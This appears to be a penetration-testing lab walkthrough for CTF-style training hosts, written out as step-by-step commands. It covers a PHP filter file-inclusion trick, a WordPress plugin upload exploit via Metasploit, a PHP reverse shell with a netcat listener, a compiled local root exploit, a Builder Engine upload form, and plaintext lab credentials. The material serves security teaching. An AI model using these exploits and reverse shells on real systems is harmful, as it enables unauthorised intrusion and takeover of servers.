    ***** look for /dev/sda5 - Linux swap / Solaris *******

mkdir /mnt/217vm

mount /dev/sdb /mnt/217vm

cd /mnt/217vm

ls

cat flag1.txt

file bobsdisk.dsk

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

/mnt/217vm# ls

cd /media/bobsdisk/

ls

cat ToAlice.eml

file bobsdisk.dsk

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

/mnt/217vm# ls

cd /media/bobsdisk/

ls

cat ToAlice.eml

file ToAlice.csv.enc

file bobsdisk.dsk

pwd

mkdir /media/bobsdisk


mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

ls

cd /media/bobsdisk/

ls

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv

ls

cat ToAlice.eml | grep flag

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv

ls

cat ToAlice.eml
    ***** look for supercalifragilisticoespialidoso ******

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv

    supercalifragilisticoespialidoso


ls

cat ToAlice.csv
-----------------------------------------------------------------------

-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

-----------------------------------------------------

The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  -- view source

Found this string in the source:
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK

------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag -----


http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  -- view source --
  -- Nothing in source --

Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  -- view source --
  -- Nothing in source --


Tried a PHP base64 decode with the URL:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php

------ https://www.base64decode.org/ -------
Use the string found here:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

-------------------------------------------------------------------
PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>

######################
# Attacking Minotaur #
######################

Step 1: Portscan/Bannergrab the target host
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.117
-----------------------------------------------------------------------


Step 2: Vulnerability scan the web server
---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd ~/toolz/Nikto2/program

perl nikto.pl -h 172.31.2.117
-----------------------------------------------------------------------


Step 3: Directory brute-force the webserver
---------------------------Type This-----------------------------------
cd ~/toolz

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.117 wordlists/big.txt
-----------------------------------------------------------------------

### dirb output ###
==> DIRECTORY: http://172.31.2.117/bull/
-----------------------------------------------------------------------


Step 4: Run wordpress vulnerability scanner
---------------------------Type This-----------------------------------
sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev

cd ~/toolz

rm -rf wpsca*

git clone https://github.com/wpscanteam/wpscan.git

cd wpscan

sudo gem install bundler && bundle install --without test development

rbenv install 2.5.0-dev

ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
-----------------------------------------------------------------------


Step 5: Attack vulnerable Wordpress plugin with Metasploit
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit

./msfconsole

use exploit/unix/webapp/wp_slideshowgallery_upload

set RHOST 172.31.2.117

set RPORT 80

set TARGETURI /bull

set WP_USER bully

set WP_PASSWORD Bighornedbulls

exploit
-----------------------------------------------------------------------

Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then from the lab network attacking other students.


---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

tar -zxvf php-reverse-shell-1.0.tar.gz

cd ~/toolz/php-reverse-shell-1.0/

nano php-reverse-shell.php
-----------------------------------------------------------------------
    ***** change the $ip and $port variables to a host that you have already compromised in the network
    ***** for this example I chose 172.31.2.64 and kept port 1234


---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------


----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
https://www.exploit-db.com/raw/34681/

python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php

-----------------------------------------------------------------------


Set up netcat listener on previously compromised host
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
    webmin1980

python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp

./boom2

nc -lvp 1234
-----------------------------------------------------------------------


---------------------Type This in your browser ------------------------
http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
-----------------------------------------------------------------------


Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id

/sbin/ifconfig

python -c 'import pty;pty.spawn("/bin/bash")'

---------------------------Type This-----------------------------------
cd /tmp
cat >> exploit2.c << out
-----------------------------------------------------------------------
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/

**************hit enter a few times *****************

---------------------------Type This-----------------------------------
out


gcc -o boom2 exploit2.c

./boom2

id
-----------------------------------------------------------------------

......YEAH - do the happy dance!!!!


 ##################
# Attacking Sedna #
###################

Attack steps:
-------------


Step 1: Ping sweep the target network
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------


Step 2: Port scan/Bannergrab the target host
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.86
-----------------------------------------------------------------------


PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         (protocol 2.0)
53/tcp   open     domain      ISC BIND 9.9.5-3-Ubuntu
80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open     pop3        Dovecot pop3d
111/tcp  open     rpcbind     2-4 (RPC #100000)
139/tcp  open     netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
143/tcp  open     imap        Dovecot imapd
445/tcp  open     netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
514/tcp  filtered shell
993/tcp  open     ssl/imap    Dovecot imapd
995/tcp  open     ssl/pop3    Dovecot pop3d
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds


Step 3: Vulnerability scan the webserver ports
---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.86

perl nikto.pl -h 172.31.2.86:8080
-----------------------------------------------------------------------


Step 4: Perform directory bruteforce against the target host
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.86 -v
-----------------------------------------------------------------------


                  or with dirbuster (dirb)


---------------------------Type This-----------------------------------
cd ~/toolz

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.86 wordlists/big.txt
-----------------------------------------------------------------------

### dirb output ###
==> DIRECTORY: http://172.31.2.86/blocks/
==> DIRECTORY: http://172.31.2.86/files/
==> DIRECTORY: http://172.31.2.86/modules/
==> DIRECTORY: http://172.31.2.86/system/
==> DIRECTORY: http://172.31.2.86/themes/

+ http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
+ http://172.31.2.86/server-status (CODE:403|SIZE:291)
### dirb output ###


Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0

An exploit for this application can be found at:
https://www.exploit-db.com/exploits/40390/


-------------------save this a "BuilderEngine.html"-------------------
<html>
<body>
<form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"

enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>
-----------------------------------------------------------------------


Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.

Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.

On the other server run:
nc -lvp 1234

Then upload the pentestmonkey reverseshell to .86

============================================ Attacking another server because I need a reverse shell =========================================